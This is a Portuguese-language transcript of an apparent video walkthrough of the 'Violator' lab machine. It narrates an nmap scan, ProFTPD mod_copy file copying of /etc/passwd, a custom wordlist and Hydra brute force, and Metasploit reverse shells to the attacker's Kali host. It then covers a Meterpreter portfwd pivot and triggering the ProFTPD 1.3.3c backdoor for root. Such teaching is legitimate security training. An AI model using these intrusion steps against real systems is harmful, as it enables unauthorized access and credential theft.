Fala pessoal, a gente vai começar aqui então a nossa quinta máquina. Deixa eu abrir aqui o browser. A máquina que a gente vai explorar agora é o Violator, né? Essa máquina foi bem tranquilo de subir ela aí no VirtualBox, porque ela já é no formato OVA aqui, né? Então foi só baixar e executar que deu tudo certinho. Essa máquina a gente vai continuar o nosso estudo aí com o ProFTPD, vai fazer a mesma exploração que a gente fez na máquina anterior com o ProFTPD, né? Utilizando o mod copy aqui dentro do ProFTPD, usando o site CPFR e o CPTO para copiar e mover arquivos. Então essa máquina aí a gente vai fazer a primeira exploração aí do ProFTPD e depois a gente vai se movimentar dentro dela, né? É uma coisa muito legal nessa máquina, que é bem parecido com a vida real, é que a gente vai ter que fazer uma word list baseada em informações do nosso alvo. Então isso acontece muito na vida real, né? Você não vai utilizar a RockU aí para quebrar a senha de um usuário, né, na vida real, não faz nem sentido. Você vai fazer um ataque de password spray, por exemplo, você vai ter que criar ali os IDs dos users, né, o nome dos usuários. Então, todo ataque que precisar de dicionário na vida real, você vai ter que fazer o dicionário na mão ali, né? Então a gente vai fazer isso nessa máquina também. Essa máquina aqui, depois que a gente explorar ela, após a exploração, ela também é no ProFTPD, mas não é a mesma versão do ProFTPD. Existe uma versão PPP2 aí, né, do ProFTPD, na versão 133C, que fora do site oficial de download, os caras publicaram aí uns downloads de instalação desse cara com um backdoor dentro. Então o exploit aqui dessa vulnerabilidade, né, que na verdade não é uma vulnerabilidade, é um backdoor, né, ele conecta via socket lá e manda o comando help acid bits aqui e recebe uma conexão como root. Isso starta o backdoor e abre uma sessão como root, né. Aqui tem o link da descrição do backdoor e tal nesse paper aqui. Tem um pouco de código-fonte aqui, ele mostra explorando manualmente também com o Telnet aqui, ó, ou Netcat, né? Se você fizer uma conexão lá que você consiga mandar comandos via socket lá, você pode mandar o help acid bits aqui e você vai receber a shell de root ali, é um backdoor nessa versão aí do ProFTPD, que não é oficial, né? Isso aí foi alguém que colocou, então isso frisa aí a importância de você não utilizar qualquer tipo de serviço, né, que não seja oficial. Então é muito difícil que isso aconteça na vida real, porque por governança a galera aí de operações de TI vai fazer as instalações dos pacotes e serviços de repositórios oficiais, né? E espera-se que seja testado esses repositórios antes de subir para produção, mas enfim, isso é meio lúdico aqui nessa máquina, mas é legal porque a gente vai testar mais um outro conceito aqui e a gente vai aprender sobre o pivoting, né? O que que é o pivoting? É quando você explora uma máquina e utiliza ela para tunelar o tráfego por ela, né? E você conseguir fazer movimentos laterais, né? Se conectar em outros servidores na rede, fazer scans dentro da rede, né? Nesse caso, por que que a gente vai fazer o pivoting? Porque tem um usuário dentro dessa máquina que tem permissão administrativa para executar um script de start desse ProFTPD aqui. Só que a hora que ele starta o ProFTPD, ele vai startar esse ProFTPD para rodar somente em localhost. Então você tem duas opções, ou você altera esse script, né, utilizando a primeira falha aqui do server para você se conectar nele como root, né? Ou você faz um pivoting, que é o que a gente vai fazer. Dentro do Metasploit, a gente vai usar o módulo aqui do port FWD, dentro do Meterpreter, que ele cria uma regra, né, de pivoting e a gente consegue executar comandos, né, e por dentro desse túnel. A gente consegue realmente tunelar todo o tráfego para dentro daquela máquina e executar como se fosse localhost mesmo naquela máquina, né? Bom, chega de papo aqui, vamos para a nossa prática. Deixa eu abrir aqui o meu Kali. Eu já fiz a parte de recon aqui do nosso alvo, né? Eu já sei o IP dele, acho que você já deve ter feito aí também. Então a primeira coisa a gente vai escanear ele. Sudo nmap "-szinho vzão para ver a versão dos serviços, "-pn para não utilizar esse MP, 192.68.2.11, que é o IP aqui do meu alvo. Deixa eu dar um "-v aqui para ficar verboso. Então ele já viu aqui de cara, né, que está aberta a porta 80 e a 21. A gente tá escaneando só 10.000 portas aqui, as portas principais, né? Não está escaneando todas as portas. Nesse caso aqui nem precisa. Então a gente já vê aqui que está rodando um ProFTPD 135. Então a gente já supõe que talvez esteja vulnerável ao modcopy, né? Como a gente fez na máquina anterior. E a gente viu aqui também que está rodando uma Apache, né? 247, aqui no Ubuntu.
a gente já tem algumas informações aí para começar, né, a nossa brincadeira. Então a gente lembra que uma das premissas para fazer o nosso ataque é que a gente consiga se conectar no FTP. Então a primeira coisa que a gente vai fazer é testar se o usuário anônimo funciona, né? 92.68.2.11, usuário anônimos, e ele deu falha no login. Por quê? Porque não está liberado o acesso de usuário anônimo nesse cara. Então a gente vai lá e abre esse cara no browser, né? Deixa eu abrir o browser aqui. A gente viu que está aberta a porta 80, então vamos abrir ele aqui no browser, no 68211. A gente não tem nenhuma aplicação de verdade rodando aqui, né? Mas é legal que se você reparar aqui, ó, tem um link da Wikipedia aqui mandando você entrar nessa página aqui que mostra informações sobre um álbum, né? Sobre uma banda aqui que tem um disco aqui que chama Violator. Ou não sei se a banda chama Violator, sei lá. Mas aqui dentro tem várias informações, então a gente deduz que os usuários e as senhas e etc. nesse alvo, né, são relacionados ao que está escrito aqui. Nesse caso, a gente poderia usar isso aqui como inteligência, né, para criar aí a nossa word list, que é o que você faria na vida real. Então, você tem um alvo lá, você precisa hackear ele, você vai levantar informações sobre esse alvo para poder criar suas word lists, né, que elas sejam efetivas. Você não vai usar a RockU para conseguir descobrir, né, senha de usuários aqui no Brasil, por exemplo, não faz sentido nenhum, né? Você vai ter que fazer algumas buscas aí relacionadas ao alvo. Então, tem várias maneiras de se fazer isso, né? Automaticamente, o que não funciona, já digo de passagem, né? Tem uma ferramenta chamada Cool, que essa ferramenta ela vai fazer vai rodar uns crawlers dentro dessa página e tudo que tiver escrito de texto aqui dentro, né, todas as palavras que estão aqui, ela vai jogar isso numa word list e aí você pode utilizar esse cara, né, como word list. Vai funcionar? Talvez funcione, mas a word list vai ficar gigantesca e não vai ser muito efetiva, né? Então, o melhor seria você fazer isso manualmente, porque daí você vai utilizar, né, o fator humano aí para pensar como uma pessoa e pensar numa word list. Então a gente lendo aqui essas informações, ele está dizendo aqui que as principais músicas aí desses caras é o Personal Jesus, Enjoying the Silence, né? Aqui Policy of True e Word in My Eyes. Então pode ser, né, que isso seja relacionado a senhas aí de usuários. Então eu criei uma lista aqui, deixa eu mostrar ela aqui para vocês. Chamei de violator.lists. Eu peguei o principal nome das músicas ali, né, Personal Business, Enjoy the Silence, Policy of True, e fiz algumas variantes dela, né, colocando espaço, tirando espaço, com maiúscula, com minúscula. Aí você poderia colocar um, dois, três, fazer várias coisas, né, relacionadas aí a essas senhas e possíveis senhas. Eu deixei isso aqui menor assim para a gente conseguir fazer isso mais rápido aqui no vídeo, mas tanto usando o Cool como fazendo manualmente a word list, ali você ia conseguir chegar no mesmo resultado, né? Só que daí agora que a gente tem uma word list aqui com possíveis senhas, né? A gente precisa enumerar usuários. Como é que a gente vai fazer isso nessa máquina? Lembra que na outra máquina a gente utilizou o Netcat para se conectar no FTP? 92.68.2.11 na porta 21, que é a porta lá do FTPD. Então a gente conectou nesse cara, a gente consegue tentar movimentar arquivos lá dentro. Se ele tiver com o mod copy habilitado, a gente vai conseguir movimentar por conta dessa versão do FTPD, né? E aqui é a versão 1.3.5, ela ainda tá dentro aqui das versões aqui 1.3x aqui que possuem o mod copy que a gente pode explorar, né? Então, como a gente vai conseguir os usuários aqui dentro do Linux, né? No etc /pswd, a gente tem ali a informação do nome dos usuários, né? O diretório raiz deles, então, o nome completo. Então, a gente tem essas informações dentro desse arquivo. A gente vai tentar mover esse arquivo para o diretório web para a gente conseguir acessar ele no browser. Então, se eu der um site cpfr aqui, como a gente fez ontem, né? A gente pode procurar o etc /pswd. Ó, ele encontrou o diretório. Se ele não tivesse permissão, por exemplo, se você tentasse bater o /etc /shadow aqui para ver o hash das credenciais, você não ia conseguir porque não tem permissão de root e tal, então ele ia dar um erro aqui, né? Então nesse caso esse aqui a gente conseguiu encontrar, significa que a gente consegue mover ele para algum lugar. Então se eu der um site cpto, como a gente viu ontem, a gente pode mover ele para algum lugar. Eu vou mover ele, o diretório padrão do Apache, né? O root padrão do servidor web no Apache é /var /www /html, né? Principalmente no Ubuntu, como a gente viu ali. Então a gente pode tentar mover para lá. /var /www /html.
barra, vamos chamar de PSWD mesmo. Então, ó, ele deu sucesso para copiar. Se não fosse esse o diretório root do servidor, né, o diretório raiz do servidor, você poderia tirar o HTML, testar só no www, e na tentativa e erro até achar, né, o diretório, que você não vai conseguir procurar isso pelo site, né, então lá pela aplicação você só vai conseguir fazer na tentativa e erro mesmo. Então a gente conseguiu copiar, deu sucesso aqui na nossa cópia, né, então a gente pode chamar ela aqui no browser agora, ó. Então a gente conseguiu aqui o acesso do PSWD. Então a gente tem ó, o nome do usuário, né, o nome completo do usuário, o diretório raiz desse usuário. Então a gente já conseguiu enumerar aqui quem são os usuários, né, e como que a gente vai utilizar eles aqui para poder quebrar a senha. Eu criei aqui uma lista que eu chamei de users.list, que eu peguei aqui os principais usuários, ó, o MG, né, o AF, o AW, o DG, são os principais usuários aqui, que tem os outros usuários aqui que não interessa muito pra gente, né? O que interessa mais são esses usuários que têm permissão de fazer alguma coisa aqui dentro do server. Então agora a gente precisa testar esses usuários. A gente não vai fazer isso manualmente, obviamente. Você poderia codificar isso num script, né? Mas a gente vai utilizar o Hydra para fazer esse teste. Tem várias outras ferramentas aí, a gente vai usar o Hydra. Se você utilizasse o parâmetro "-l" minúsculo, você poderia setar um usuário default aqui. Então, vamos supor que você já sabe que o usuário, sei lá, é um número. Você colocaria ele aqui, né? E passaria a word list na sequência. Mas a gente não quer um usuário fixo, a gente quer uma lista de usuários. Então, você põe o L maiúsculo e a gente chama aqui o users.list. Se você estivesse fazendo um ataque de password spray aqui, né, onde você sabe a senha, mas não sabe o usuário, você quer testar se algum usuário se conecta naquela possível senha, você poderia colocar tipo "-p" minúsculo aqui e sei lá, violator arroba 2020, né? Aí ele ia testar essa lista de usuários dentro, qual usuário desse consegue logar com essa senha aqui, né? Mas a gente quer fazer o ataque para testar os usuários e as senhas que a gente levantou. Então eu vou dar um "-p" maiúsculo para passar a lista de passwords e vou passar a minha lista aqui que eu chamei de violator.list. Então vou passar o IP do alvo, né, 192.168.2.11 aqui, e agora você vai passar o protocolo. Se fosse SSH, você botava SSH, mas no nosso caso aqui é FTP, então a gente passa o FTP. Aí ele vai fazer as requisições lá no server, vai tentar conectar, e assim que ele conseguir conectar com algum usuário, né, ele vai trazer aqui, ó, como ele fez agora, a informação para a gente, que o login AF, a senha é Enjoy the Silence, né? O login DG, a senha é Policy of True, porque eram as senhas que estavam dentro daquela lista. Eu vou até parar aqui que já é o suficiente. Então, se você tivesse usado o cool, por exemplo, para fazer a lista, ele ia ficar uma eternidade aqui testando, né? Então, pode funcionar, mas pode demorar mais. Então, tudo depende de como que você vai fazer esse levantamento aí, né? Agora a gente pode testar, então, conectar nesses caras. Se eu der um FTP aqui, por exemplo, né, 92.68.2.11, eu vou tentar conectar com a F. E a senha é Enjoy the Silence. Enjoy the Silence. Aí a gente conseguiu conectar aí, né, dentro aqui do nosso servidor. Então a gente já conseguiria continuar o ataque aí de fazer um put aqui, mandar um arquivo aqui para dentro, movimentar ele, né, com o site CPTO e site CPFR para jogar ele para o browser e executar. Então a sequência manual do ataque aí seria criar um netcat, por exemplo, né, abrir ele aqui como um listener na tua máquina, escrever esse script aí, né, que faria a conexão reversa e upar ele aqui, fazer a movimentação dele, encontrar ele com o CPFR e copiar ele com o CPTO lá para o diretório do Apache e executar ele no browser, então ele abriria a sessão, né? Mas a gente quer fazer isso aqui pelo Metasploit para ser, além de ser mais rápido, né? A gente já entendeu qual que é a lógica. Sudo msf console. A gente vai utilizar o mesmo exploit que a gente usou ontem para fazer aí essa primeira conexão. Então, search modcopy, vai encontrar o exploit aqui, use 0. A gente tem aqui as opções para setar, então set rhosts 192.168.2.11, que é o nosso alvo. Aqui a gente precisa alterar o site path, porque ele está em /var /www. E a gente viu que é /var www HTML, né? Então eu vou dar um set site path /var /www /html.
E assim a gente já configurou o rhost. Agora vamos setar um payload aqui. A gente vai setar um payload simples, né? Payload, dá um tab aqui. Usar a conexão reversa como sempre, utilizando o Python aqui. Então eu posso setar agora meu lhost 192.68.2.5, que é o IP do meu Kali. Set lport 443, né? Como sempre. Então agora eu vou dar um exploit aqui. A gente conseguiu então aqui nosso primeiro acesso nesse cara, né, com o nosso usuário aqui do www.data. A gente vai criar uma shell interativa aqui para ficar mais fácil. Então vou dar um Python "-c" de comando import para importar o PTY. Eu quebro linha. Então eu vou instanciar o spawn aqui, que é uma função dentro do PTY, que vai chamar o /bin/bash. Opa, eu digitei errado aqui. Opa, faltou o H no bash aqui. Beleza. Python "-c", de linha de comando, import PTY, quebra linha, pty.spawn para spawn para chamar o /bin/bash. Aí, agora funcionou. Então, agora que a gente está com a nossa shell interativa aqui, né, que é como se estivesse conectado via SSH, eu vou dar um sul aqui para mudar de usuário e a gente conseguiu a senha do AF e do DG. Então, eu vou conectar com o usuário DG e a senha do DG é policy of truth. Opa. Policy of truth. Então, a gente conseguiu conectar aqui, né, com o usuário DG. E esse cara, se você der um sudo "-l" aqui nele, você vai ver que ele tem permissão lá no /etc /sudoers para executar esse script aqui de inicialização do ProFTPD como root. Então, se você navegar aqui /home /dg /bd, você vai ver o diretório onde está esse ProFTPD aqui, né? Então, se você for em /etc, você vai ver aqui que tem um arquivo chamado proftpd.conf, que é o arquivo de configuração do ProFTPD. Então eu dei um cat nele aqui para ler. Ele está dizendo aqui que esse ProFTPD ele vai rodar na porta 2121, né? Ele vai rodar somente como localhost aqui, ó, 127.0.0.1. Então se você quiser, você pode usar a falha do modcopy para alterar esse arquivo aqui, né, e tirar esse 127.0.0.1 para ele poder se conectar fora de localhost aqui, mas a gente vai deixar para poder conversar um pouco aqui sobre o pivoting. Então, esse cara aqui, como a gente tem a permissão para executar ele, né, como root, primeiro eu vou dar um netstat aqui, nos ANTP. O A é de all, né, de todos os protocolos e portas. O N é de numeric para ele não mostrar, não resolver nome, né, e não mostrar DNS, mostrar só IPs. O T é de TCP e o P, né, vai mostrar os processos, aí, os PIDs, né, que estão rodando. Então aqui a gente consegue ver, ó, primeiro a nossa conexão aqui, ó, esse cara aqui é o nosso Kali, né? Então ele tá liberado aqui a 21 e a 80 aqui nos serviços e tá mostrando a nossa conexão com o nosso Kali aqui também, né, em tempo que a gente está conectado. Então a partir do momento que a gente executar esse cara ali do script, deixa eu dar um sudo "-l" de novo para ver onde que ele está aqui. Esse script que está em /home dg bd sbin proftpd aqui, a gente consegue executar ele como root, ó. Então, a partir do momento que eu executei, ele setou aqui o endereço default como 127.0.0.1, né? E iniciou aqui então o serviço. Então, se eu der agora de novo aqui o netstat -antp, você consegue ver aqui que ele está rodando localhost 2121. Só que se eu splitar meu terminal aqui e tentar conectar nele, ó, nc 192.68.2.11 na porta 2121, ele vai dar refused, ó, ele não me deixa conectar lá, porque ele só permite a conexão ali para localhost. Então o que a gente vai fazer? A gente vai dar um Ctrl Z aqui para jogar essa sessão para background. Se eu der um sessions aqui, ó, a minha sessão 1 aqui, ela é uma shell simples. E eu
para poder utilizar o port FWD aqui dentro do Metasploit, eu preciso que seja um Meterpreter. Então eu preciso promover essa shell aqui, né? Eu preciso dar um upgrade nela aí. Lembrem que o Meterpreter ele é extremamente detectável, né? Então qualquer mecanismo de defesa aí vai detectar que é um Meterpreter. Mas vamos continuar aqui. Então se você procurar aqui dentro do Metasploit, tem um módulo auxiliar que chama shell underline to underline Meterpreter. Que esse cara aqui, ó, post multi manage shell to Meterpreter, ele permite fazer o upgrade daquela shell ali. Então vou dar um use 0 para usar ele aqui. A gente tem que setar o lhost, né, porque ele vai abrir uma sessão com a gente. Então set lhost 192.68.2.5, que é o IP do meu Kali. A lport eu vou deixar 4433 aqui mesmo. Ele adicionou automaticamente mais um 4 ali antes da porta, né? Você poderia colocar a porta que você quisesse aí. Set session eu vou setar a seção 1, que é a seção que a gente quer fazer o upgrade da shell. Então eu setei a seção 1, agora eu vou dar um run aqui, né, para ele executar. Então ele vai tentar fazer o upgrade dessa shell. O que ele vai fazer automaticamente? Né? Ele vai se conectar nessa shell, vai inserir, fazer o upload lá do Meterpreter, daí ele vai startar o handler aqui na nossa máquina e vai fazer aquele Meterpreter, executar o Meterpreter que vai se conectar nesse handler, né? Foi o que ele fez aqui, ó. Ele startou o handler, então ele jogou o Meterpreter lá para dentro da máquina, chamou o Meterpreter, né? E a hora que ele executou, ele abriu aqui a seção 2 aqui com a gente. Só esperar ele terminar aqui. Às vezes ele dá umas travadinhas assim mesmo. Então agora ele já completou aqui. Se eu der um sessions aqui dentro do Metasploit, eu vou ter aberto a seção 2 aqui, ó, que é um Meterpreter, né? O Meterpreter ele tem várias funções que a gente consegue executar. Então eu vou dar um sessions aqui para interagir com a seção 2. A gente está aqui no Meterpreter. Dentro desse cara, o que a gente vai fazer? Né? A gente tem o port FWD. Opa. Que esse cara ele consegue fazer esse tunelamento para a gente aí, para a gente poder fazer esse pivoting, né? Deixa eu abrir aqui a documentação. Então o que esse cara faz? Ele vai fazer esse túnel para a gente entre a nossa máquina e a máquina que a gente invadiu aqui, para a gente conseguir fazer o pivoting. Então ele tem alguns comandos, né, como o add para adicionar o túnel e o delete para deletar o túnel. Então eu vou deletar o túnel, eu vou passar uma porta local dentro da minha máquina, então eu vou acessar localhost e a hora que eu acessar essa porta, ela vai ser tunelada para uma porta lá no destino, que seria esse "-p aqui, e a porta que ele vai tunelar lá para o destino. E o "-r é o host, né, o que ele vai fazer esse tunelamento. Então se eu der um port FWD aqui, eu posso passar o add, né, para adicionar então essa nova rota aí que a gente vai fazer aqui entre a gente e o nosso alvo. Então vamos passar o "-l aqui para dizer que L maiúsculo aqui para dizer que é 127001, que é como ele vai ser visto do lado de lá, né? Então eu vou passar o "-l minúsculo aqui para dizer qual que é a porta do lado de lá, que é a 2121. Então eu vou dar o "-r, "-p aqui para passar a nossa porta, que é 2121 também. Você poderia pôr a porta que você quisesse aqui. E vou dar o "-r para dizer qual que é o host remoto aqui, né? Que vai ser a gente, 127.0.0.1. Então, basicamente, o que ele criou aqui, ó, que tudo que for requisitado em 127.0.0.1 na porta 21.21, ele vai executar lá no alvo na 127.0.0.1.21.21 também. Então, a gente criou, né, esse tunelamento entre a gente e o nosso alvo. Então, agora, vou dar um Ctrl Z aqui de novo para jogar essa sessão para background. Eu consigo executar comandos aqui em localhost. A hora que eu executar em localhost, ele vai sair lá para dentro do nosso alvo. Então, se eu dar um search aqui agora, 133C, que é o exploit que a gente vai usar aqui do backdoor, né? Que na verdade não é exploit, ele só vai chamar o backdoor lá dentro. Né? Então, dá um use 0 aqui, só para vocês verem de novo aqui o que o exploit faz. Ele só se conecta via socket e executa lá o help acid bits lá, né? Então, só para vocês verem aqui, se a gente tentar executar isso utilizando o IP remoto, né, dessa máquina, a gente não vai conseguir porque a requisição ela só é permitida de localhost. Então agora a gente vai
configurar esse cara aqui. Então no R-host, quem que vai ser o host remoto? Não vai ser mais o IP lá, 192.168.2.11. Vai ser a gente, vai ser localhost, porque a gente criou esse tunelamento, então o que eu executar em localhost, ele vai executar lá também, né? Então você está aqui, R-host, do host remoto. Eu vou colocar 127.0.0.1, que é o que a gente criou ali no nosso túnel, né? E o rport é 2121. Então, agora a gente tem aqui setado, ao invés do IP remoto do cara, a gente do nosso alvo, a gente vai executar isso no nosso próprio Kali. Então eu preciso setar um payload, né? Set payload normalmente. Dei um tab aqui, eu vou utilizar, ó, ele tem algumas opções, vamos utilizar o reverse purl aqui, ó. Reverse purl. Agora o payload a gente vai setar normal, porque a gente vai fazer ele se conectar dentro do nosso alvo aqui. Eu não vou colocar 127.0.0.1 para ele não executar lá no cara. Eu vou colocar o meu IP aqui mesmo, né? 7lhost 192.68.2.5, que é o IP remoto aqui da minha máquina, né? Do meu Kali. 7lport é a porta que você quiser, né? Vamos colocar 8080 aqui. Opa, 7lport. Então agora eu vou dar um exploit. Então ele startou o handler aqui, ele está mandando isso por dentro do nosso túnel, né, lá com essa máquina. Então a gente vai esperar aqui agora, ele já abriu a seção 3. Então ele já conseguiu fazer o tunelamento e executar como localhost lá dentro da máquina. Então agora, como a gente já abriu a seção 3, a gente abriu essa seção como root. Então agora a gente conseguiu fazer o tunelamento e conseguiu acessar, né, como root essa máquina. É claro que na vida real você não vai encontrar esse exploit aí do backdoor, né? Não vai encontrar essa possibilidade de exploração, é muito difícil, mas essa máquina serviu para vocês aprenderem aí sobre como fazer a word list, né, do jeito certo aí na vida real, e também como funciona o tunelamento aqui dentro do Metasploit para você conseguir fazer o pivoting. Então isso é bem legal aí para vocês pegarem mais essa skill. Beleza? Todos os links de apoio estão aqui embaixo na descrição. O link da máquina de amanhã também está aqui embaixo na descrição. Beleza? Qualquer dúvida, manda mensagem lá no grupo. E para quem ainda não está inscrito no canal, se inscreve aí, deixa aí um joinha para ajudar a gente aí. Muito obrigado pela presença de todos vocês e até a máquina de amanhã. Valeu?